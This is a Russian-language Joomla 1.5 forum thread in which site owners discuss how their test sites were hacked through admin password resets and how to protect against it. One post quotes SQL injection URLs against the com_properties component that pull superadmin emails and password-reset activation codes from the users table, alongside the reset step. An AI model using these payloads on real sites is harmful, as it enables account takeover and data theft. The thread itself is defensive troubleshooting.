Joomla 1.5 Взломали сайт. как?

Тема в разделе "Вопросы безопасности", создана пользователем Дикий Кошак, 02.04.2010.

  1. Offline

    Дикий Кошак Недавно здесь

    Регистрация:
    09.03.2009
    Сообщения:
    111
    Симпатии:
    12
    Пол:
    Мужской
    Вот произошла тут забавная для меня ситуация)

    Ломанули сайт... но не какой-то из действующих... а на котором я тестирую всякую хренотень, понятное дело на нем безопасности ноль, но все-таки интересен сам принцип взлома.

    Для начала на почту я получаю такое письмо:
    А потом сайт стал выглядеть как на скриншоте)

    Отсюда вопрос - что за сброс пароля? как это сделано и на сколько к этому уязвима нормально настроенная джумла?

    Спасибо.
     

    Вложения:

    • hack.jpg
      hack.jpg
      Размер файла:
      61.4 КБ
      Просмотров:
      84
    Последнее редактирование модератором: 10.05.2010
  2.  
  3. Fanamura
    Offline

    Fanamura Доброта

    Регистрация:
    12.03.2007
    Сообщения:
    5 108
    Симпатии:
    159
    Пол:
    Мужской
    Дикий Кошак, какие компоненты были установлены?
     
  4. Offline

    Roxy Недавно здесь

    Регистрация:
    10.05.2010
    Сообщения:
    4
    Симпатии:
    0
    Пол:
    Женский
    Знакомая картинка) меня также один раз взломали...(_K-H-S_)... и вообще периодически приходят на почту запросы сброса пароля... иногда бессмысленно, а порой бывает действительно меняют пароль админа...(( про принцип взлома читала где-то на форуме (я так поняла это распространенный способ взлома joomla), вот что пишут по этому поводу: "доступ к сайту происходит только через com_properties:
    1. Выясняется электронка суперадмина:
    index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,email,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
    2. Заказывается сброс пароля:
    index.php?option=com_user&view=reset
    3. Узнается кодовое слово:
    index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,activation,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,1
    и тд..."
    теперь вопрос, что надо сделать, чтобы избавиться от этой уязвимости...?)))
     
  5. Offline

    _voland_ специалист

    Регистрация:
    12.04.2008
    Сообщения:
    2 173
    Симпатии:
    102
    Пол:
    Мужской
    Список компонентов в студию.. Уже 10ый раз создается подобная тема и хоть половина бы список писала!!
     
  6. Offline

    Roxy Недавно здесь

    Регистрация:
    10.05.2010
    Сообщения:
    4
    Симпатии:
    0
    Пол:
    Женский
    JCE
    CK Forms
    Phoca Gallery
    Phoca Guestbook
    Xmap... вот вроде бы и все!
     
  7. Offline

    _voland_ специалист

    Регистрация:
    12.04.2008
    Сообщения:
    2 173
    Симпатии:
    102
    Пол:
    Мужской
    1) com_properties это что?
    2) так кого взломали то?
     
  8. Offline

    Roxy Недавно здесь

    Регистрация:
    10.05.2010
    Сообщения:
    4
    Симпатии:
    0
    Пол:
    Женский
    взломали мой сайт, я написала список всех компонентов, которые имеются на сайте (com_properties -это просто пример подобного взлома, не имеет никакого отношения к моему сайту))
     
  9. Offline

    _voland_ специалист

    Регистрация:
    12.04.2008
    Сообщения:
    2 173
    Симпатии:
    102
    Пол:
    Мужской
    ясно, CK forms какой версии? В 1.3.41 (если правильно помню версию) есть уязвимость
     
  10. Offline

    Roxy Недавно здесь

    Регистрация:
    10.05.2010
    Сообщения:
    4
    Симпатии:
    0
    Пол:
    Женский
    v1.3.3, да, скорей всего, уязвимость именно в этом компоненте, поставлю поновей версию....)
     
  11. Offline

    refoxter Недавно здесь

    Регистрация:
    29.09.2007
    Сообщения:
    124
    Симпатии:
    1
    Пол:
    Женский
    Аналогичный взлом сегодня. Та же картинка на сайте, тоже тестовый сайт без никакой защиты.
    Установленные компоненты на картинке. Был запрос на сброс пароля. Пароль администратора изменен, рабочий шаблон (index.php) заменен на что-то своё, турецкое. Восстановила свой пароль в базе, зашла в админку, поменяла шаблон на дефолтный, вроде все осталось на месте.
    Но, честно говоря, не задумывалась раньше, через что все же сбрасывают пароль? Объясните, пожалуйста, алгоритм этого взлома. И защиты от него.
     

    Вложения:

    • com.jpg
      com.jpg
      Размер файла:
      69.4 КБ
      Просмотров:
      26
    Последнее редактирование: 07.08.2010
  12. Offline

    _voland_ специалист

    Регистрация:
    12.04.2008
    Сообщения:
    2 173
    Симпатии:
    102
    Пол:
    Мужской
    Нужно смотреть версии компонентов и логи... idoblog на вскидку точно имел уязвимости
     
  13. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 573
    Симпатии:
    152
    Пол:
    Мужской
    Если был запрос на сброс пароля, вернее всег взломали почту. Или возможно есть какая то дыра в самом движке, жаль не указаны версии
     
  14. Offline

    refoxter Недавно здесь

    Регистрация:
    29.09.2007
    Сообщения:
    124
    Симпатии:
    1
    Пол:
    Женский
    Прошу прощения, не указала версию Джумлы.
    Joomla 1.5.15.
    Версии компонентов на картинке, специально так сохранила.
    Ломают почту... То есть сначала ломают ящик, потом на него приходит новый пароль, они им пользуются и заходят в админку? Так? А как узнается адрес почты администратора, который надо сломать? Меры борьбы?
    Где смотреть логи? Те, что в папке log? Что нужно искать? Не имею опыта разбора логов. Вроде бы нашла какие-то похожие строчки взлома, но они мне ни о чем не говорят...
     
    Последнее редактирование: 07.08.2010
  15. Offline

    refoxter Недавно здесь

    Регистрация:
    29.09.2007
    Сообщения:
    124
    Симпатии:
    1
    Пол:
    Женский
    Все-таки, странно это происходит. Рукотворно взламывают или автоматом?
    Мне пришло письмо с запросом сброса пароля от несуществующей учетной записи. На сайте (и в базе соответственно) два пользователя. Пришло письмо от адреса зарегистрированного пользователя на адрес администратора, но логин зарегенной записи другой. Руками что-ли письма правили?
    В логах предположительно вот это время письма и взлома:
     
    Последнее редактирование: 07.08.2010
  16. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 573
    Симпатии:
    152
    Пол:
    Мужской
    Давайте по порядку. Письмо на сброс пароля приходит на вашу почту? Стало быть варианта два, либо взломщик имеет доступ к вашей почте, либо на второй, неизвестный адрес приходит копия письма со сбросом пароля. Как вариант, временно покосите всех юзеров кроме админа, и запретите регистрацию и обновитесь до последней версии
     
  17. Offline

    refoxter Недавно здесь

    Регистрация:
    29.09.2007
    Сообщения:
    124
    Симпатии:
    1
    Пол:
    Женский
    Сейчас с хостером выясняем несанкционированные входы на почтовый сервер. Думаю, что будет второй вариант, с копией письма. Хостер говорит, что почтовый сервер достаточно хорошо у них защищен, но это мне ни о чем не говорит.
    Сайт этот тестовый, я могу его весь полностью удалить, но на нем я пробовала делать сайт именно с клубной системой, с личными блогами и профилями. Проект в рабочем варианте будет именно с регистрациями и блогами или форумом. Грешу все же на idoblog. Слишком он имеет свои авторизации и профили ненужные.
    Тревожит, что на этом аккаунте хостера у меня еще пяток сайтов на Джумле разных версий. FTP заблокирован по IP-адресу, многие входы других сайтов тоже. Все в целости. А взломан тот, где тестировались разные компоненты, подбирались для сборки. И защиты, соответственно, никто не делал.
    Читала, что ищется администратор с наименьшим ID. А если поступить, как советовали, сделать админом участника с другим ID? Что думаете?
    ---
    Читаю внимательно логи. Похоже на idoblog все больше и больше.
     
    Последнее редактирование: 08.08.2010
  18. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 573
    Симпатии:
    152
    Пол:
    Мужской
    Как выяснилось, все версии джумла до версии 1.5.19 уязвимы. Кто возможно написал бота
    ЗЫ Попросите хостера посмотреть куда ходила почта с вашего сайта (если возможно)
     
  19. Offline

    refoxter Недавно здесь

    Регистрация:
    29.09.2007
    Сообщения:
    124
    Симпатии:
    1
    Пол:
    Женский
    Вот в логах строчка узнавания адресов
    Время тоже совпадает.
     
  20. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 573
    Симпатии:
    152
    Пол:
    Мужской
    Это полная строка, или в окончании что то еще есть?
     
  21. Offline

    refoxter Недавно здесь

    Регистрация:
    29.09.2007
    Сообщения:
    124
    Симпатии:
    1
    Пол:
    Женский
    Да, извините. Вот полная строчка узнавания адресов:
    Перед этим такая строчка узнавания логинов и кодовых символов (или что они там узнают...)
    Сначала долго прощупывался LyftenBloggie, но, похоже, что безуспешно. А вот с idoblog прокатило.
    Хостер пока не ответил про почту.
     
    Последнее редактирование: 08.08.2010

Поделиться этой страницей

Загрузка...